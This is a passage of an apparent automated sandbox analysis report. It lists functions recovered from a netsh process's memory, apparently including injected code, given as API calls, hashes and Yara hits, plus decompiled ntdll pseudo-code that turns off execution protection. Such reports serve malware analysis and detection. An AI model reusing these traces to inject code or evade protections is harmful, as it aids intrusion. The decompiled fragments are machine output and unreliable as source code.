                                                                                                                                                                                          Function 007291B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0071F050,?,?,00000000), ref: 007291EC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                          • Opcode ID: dfd687a368151b96c951bdfed8c57082f8c90fd7efff9cd705ea1fad239337be
                                                                                                                                                                                          • Instruction ID: 64e46ccbd5207587b4f0993ca9fd4ff5f3670c3c3541584478163c5537884c88
                                                                                                                                                                                          • Opcode Fuzzy Hash: dfd687a368151b96c951bdfed8c57082f8c90fd7efff9cd705ea1fad239337be
                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E092373803147AE3306699AC03FA7B39CDB81B60F150036FB0DEB2C1D999F80142A4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 007291A7 Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0071F050,?,?,00000000), ref: 007291EC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                          • Opcode ID: 1f3d146865b562b584d38a4458419af3894d99bcde8e069383295815aca5e084
                                                                                                                                                                                          • Instruction ID: d3a3b558743d5ff1098d417c9cea4f98bfadd1ad627af374c8ea5c4dca30fdc8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f3d146865b562b584d38a4458419af3894d99bcde8e069383295815aca5e084
                                                                                                                                                                                          • Instruction Fuzzy Hash: ADE0223678031076E3302A88AC47FAB72989F81F10F540025FB08AB2C1DAA8F8404294
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0072A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0071F1D2,0071F1D2,?,00000000,?,?), ref: 0072A800
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                          • Instruction ID: 8b39ea5fe9e50ecd1e3b5915b2322db69f91c553dd8a9e8ec7fc9c2bbe289d97
                                                                                                                                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3E01AB1200218ABDB10DF49DC85EE737ADEF88650F118154BA0857241C934E8108BF5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0071F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,00718D14,?), ref: 0071F6FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                                          • Instruction ID: 0416a55f2cea6f8112493a94d8effe32d21f93abaa9b7e7b289a8e831a417e21
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 24D05E616503082AE710AAA89C17F6632886B54B00F4A0064F948962C3D954E4004565
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 7e3acf72d886f47d6fbb341eb0b45f8f5fee3070e45c79f2c30464cf9bfd0278
                                                                                                                                                                                          • Instruction ID: b64541376944d1d40c2a47893a93a65368d06ca433bab50a96054c8995450a31
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3acf72d886f47d6fbb341eb0b45f8f5fee3070e45c79f2c30464cf9bfd0278
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2B09B719115D9D6DA11D7605B087177D4567D0701F16C455E1460641E873CC1D1F176
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 00727330 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a64b12d3c80727b9d88607e8ff55b479e350ea26af3cd4624f478d7bfab48913
                                                                                                                                                                                          • Instruction ID: 64041bd1242e779a5fde58a483a32668723af28031944a5d1fd7b1ba4c2b46de
                                                                                                                                                                                          • Opcode Fuzzy Hash: a64b12d3c80727b9d88607e8ff55b479e350ea26af3cd4624f478d7bfab48913
                                                                                                                                                                                          • Instruction Fuzzy Hash: BDA0011BF490180144285C9A78410B4E3A5D297176D9032BBDE4DB35026802C426119D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03207550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                          			E03207550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x32cb370 ^ _t107;
				_v8 =  *0x32cb370 ^ _t107;
				_t105 = __ecx;
				if( *0x32c6664 == 0) {
					L5:
					return E03214B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E031DE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E03207738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E0320763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E03212B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E032076ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E0325EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E03218F40( &_v548, 0, 0x214);
						_t106 =  *0x32c6664;
						_t110 = _t108 + 0x20;
						 *0x32c91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x32c6664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E03214C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E0325EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E0321A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E0325EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E0321A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E0325EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E0324CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E0325EF10();
						goto L15;
					}
					L8:
					_t56 = E03207648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                                                                                                                          0x03207560
                                                                                                                                                                                          0x03207562
                                                                                                                                                                                          0x0320756f
                                                                                                                                                                                          0x03207571
                                                                                                                                                                                          0x032075ab
                                                                                                                                                                                          0x032075b9
                                                                                                                                                                                          0x032075b9
                                                                                                                                                                                          0x03207579
                                                                                                                                                                                          0x03207583
                                                                                                                                                                                          0x0320758f
                                                                                                                                                                                          0x03244443
                                                                                                                                                                                          0x03207595
                                                                                                                                                                                          0x0320759e
                                                                                                                                                                                          0x0320759e
                                                                                                                                                                                          0x032075a2
                                                                                                                                                                                          0x032075bc
                                                                                                                                                                                          0x032075c2
                                                                                                                                                                                          0x032075c7
                                                                                                                                                                                          0x032075c9
                                                                                                                                                                                          0x03207621
                                                                                                                                                                                          0x03207623
                                                                                                                                                                                          0x03207624
                                                                                                                                                                                          0x032075f8
                                                                                                                                                                                          0x032075ff
                                                                                                                                                                                          0x03207601
                                                                                                                                                                                          0x0320762c
                                                                                                                                                                                          0x03207603
                                                                                                                                                                                          0x03207609
                                                                                                                                                                                          0x03207610
                                                                                                                                                                                          0x03207612
                                                                                                                                                                                          0x03207612
                                                                                                                                                                                          0x03207612
                                                                                                                                                                                          0x03207614
                                                                                                                                                                                          0x03207616
                                                                                                                                                                                          0x03207630
                                                                                                                                                                                          0x03207633
                                                                                                                                                                                          0x03207633
                                                                                                                                                                                          0x03207618
                                                                                                                                                                                          0x0320761a
                                                                                                                                                                                          0x032445c9
                                                                                                                                                                                          0x032445c9
                                                                                                                                                                                          0x032445d1
                                                                                                                                                                                          0x032445d2
                                                                                                                                                                                          0x032445d4
                                                                                                                                                                                          0x032445d6
                                                                                                                                                                                          0x032445d6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0320761a
                                                                                                                                                                                          0x032075ce
                                                                                                                                                                                          0x032075d4
                                                                                                                                                                                          0x032075da
                                                                                                                                                                                          0x032075df
                                                                                                                                                                                          0x032075e1
                                                                                                                                                                                          0x0324444a
                                                                                                                                                                                          0x03244450
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x03244456
                                                                                                                                                                                          0x03244469
                                                                                                                                                                                          0x03244476
                                                                                                                                                                                          0x03244486
                                                                                                                                                                                          0x0324448b
                                                                                                                                                                                          0x03244497
                                                                                                                                                                                          0x032444b9
                                                                                                                                                                                          0x032444bf
                                                                                                                                                                                          0x032444c1
                                                                                                                                                                                          0x032444c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032444c9
                                                                                                                                                                                          0x032444cf
                                                                                                                                                                                          0x032444d1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032444dc
                                                                                                                                                                                          0x032444de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032444e6
                                                                                                                                                                                          0x032444ed
                                                                                                                                                                                          0x032444ef
                                                                                                                                                                                          0x032445c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032445c4
                                                                                                                                                                                          0x032444f7
                                                                                                                                                                                          0x032444f8
                                                                                                                                                                                          0x03244510
                                                                                                                                                                                          0x03244515
                                                                                                                                                                                          0x03244524
                                                                                                                                                                                          0x0324452b
                                                                                                                                                                                          0x0324452c
                                                                                                                                                                                          0x0324452e
                                                                                                                                                                                          0x03244556
                                                                                                                                                                                          0x03244561
                                                                                                                                                                                          0x03244567
                                                                                                                                                                                          0x03244569
                                                                                                                                                                                          0x0324456c
                                                                                                                                                                                          0x0324456e
                                                                                                                                                                                          0x03244574
                                                                                                                                                                                          0x03244576
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0324457c
                                                                                                                                                                                          0x0324457c
                                                                                                                                                                                          0x03244584
                                                                                                                                                                                          0x03244588
                                                                                                                                                                                          0x0324458a
                                                                                                                                                                                          0x0324458c
                                                                                                                                                                                          0x0324458e
                                                                                                                                                                                          0x0324458e
                                                                                                                                                                                          0x0324459b
                                                                                                                                                                                          0x032445a0
                                                                                                                                                                                          0x032445a7
                                                                                                                                                                                          0x032445ac
                                                                                                                                                                                          0x032445ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032445b4
                                                                                                                                                                                          0x032445b4
                                                                                                                                                                                          0x032445b7
                                                                                                                                                                                          0x032445b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032445bf
                                                                                                                                                                                          0x03244530
                                                                                                                                                                                          0x03244535
                                                                                                                                                                                          0x03244537
                                                                                                                                                                                          0x03244539
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0324453e
                                                                                                                                                                                          0x032075e7
                                                                                                                                                                                          0x032075e9
                                                                                                                                                                                          0x032075ee
                                                                                                                                                                                          0x032075f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032075f2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032075a4
                                                                                                                                                                                          0x032075a4
                                                                                                                                                                                          0x032075a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032075a4

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0324454D
                                                                                                                                                                                          • ExecuteOptions, xrefs: 032444AB
                                                                                                                                                                                          • Execute=1, xrefs: 0324451E
                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03244530
                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 03244592
                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03244460
                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03244507
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                                          • Opcode ID: a8d9166983f78784d3c86c52d95b92f7fb5f73ee9092e6936fd68fcbbcb91233
                                                                                                                                                                                          • Instruction ID: c43119e9621488ea8e667cd9f41af3d0658f2ada83c993c6badf91afe81e2a92
                                                                                                                                                                                          • Opcode Fuzzy Hash: a8d9166983f78784d3c86c52d95b92f7fb5f73ee9092e6936fd68fcbbcb91233
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B51ED75A203197ADF14EF99DC95FED77A8AF18300F1404A9E9059B1C1DBB0ABC98A50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 031D9046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E031D9046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x32abe98);
				E03227C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E03218F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E031E9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x32c65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E031EA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E031F5A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E031F04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x32c65e0; // 0x7537a680
							 *0x32c91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x32c65e8; // 0x764c7740
									if(_t148 != 0) {
										 *0x32c91e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E031EDC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E031E3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E031E9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E0323247B();
									goto L26;
								} else {
									_t152 = E031EA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E031F04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}















                                                                                                                                                                                          0x031d9046
                                                                                                                                                                                          0x031d9046
                                                                                                                                                                                          0x031d904b
                                                                                                                                                                                          0x031d9050
                                                                                                                                                                                          0x031d9055
                                                                                                                                                                                          0x031d905b
                                                                                                                                                                                          0x031d905d
                                                                                                                                                                                          0x031d9066
                                                                                                                                                                                          0x031d906f
                                                                                                                                                                                          0x031d9078
                                                                                                                                                                                          0x031d9080
                                                                                                                                                                                          0x031d9088
                                                                                                                                                                                          0x031d908f
                                                                                                                                                                                          0x031d9095
                                                                                                                                                                                          0x031d90a9
                                                                                                                                                                                          0x031d90b1
                                                                                                                                                                                          0x031d90be
                                                                                                                                                                                          0x031d90c6
                                                                                                                                                                                          0x031d90cf
                                                                                                                                                                                          0x031d90e2
                                                                                                                                                                                          0x031d90f7
                                                                                                                                                                                          0x031d90fb
                                                                                                                                                                                          0x031d9118
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x031d9123
                                                                                                                                                                                          0x031d913b
                                                                                                                                                                                          0x031d913f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x031d9147
                                                                                                                                                                                          0x0323231f
                                                                                                                                                                                          0x0323231f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0323231f
                                                                                                                                                                                          0x031d9154
                                                                                                                                                                                          0x03232330
                                                                                                                                                                                          0x03232336
                                                                                                                                                                                          0x03232336
                                                                                                                                                                                          0x031d915a
                                                                                                                                                                                          0x031d915a
                                                                                                                                                                                          0x031d915a
                                                                                                                                                                                          0x031d9161
                                                                                                                                                                                          0x031d9167
                                                                                                                                                                                          0x031d916b
                                                                                                                                                                                          0x031d9172
                                                                                                                                                                                          0x031d9182
                                                                                                                                                                                          0x031d918e
                                                                                                                                                                                          0x031d9199
                                                                                                                                                                                          0x031d91ba
                                                                                                                                                                                          0x031d91be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x031d91e0
                                                                                                                                                                                          0x03232358
                                                                                                                                                                                          0x03232360
                                                                                                                                                                                          0x03232368
                                                                                                                                                                                          0x0323236a
                                                                                                                                                                                          0x03232372
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x03232378
                                                                                                                                                                                          0x03232378
                                                                                                                                                                                          0x03232381
                                                                                                                                                                                          0x03232458
                                                                                                                                                                                          0x03232458
                                                                                                                                                                                          0x0323245b
                                                                                                                                                                                          0x03232463
                                                                                                                                                                                          0x03232468
                                                                                                                                                                                          0x0323246e
                                                                                                                                                                                          0x0323246e
                                                                                                                                                                                          0x032324a7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x032324a7
                                                                                                                                                                                          0x0323238f
                                                                                                                                                                                          0x03232396
                                                                                                                                                                                          0x0323239c
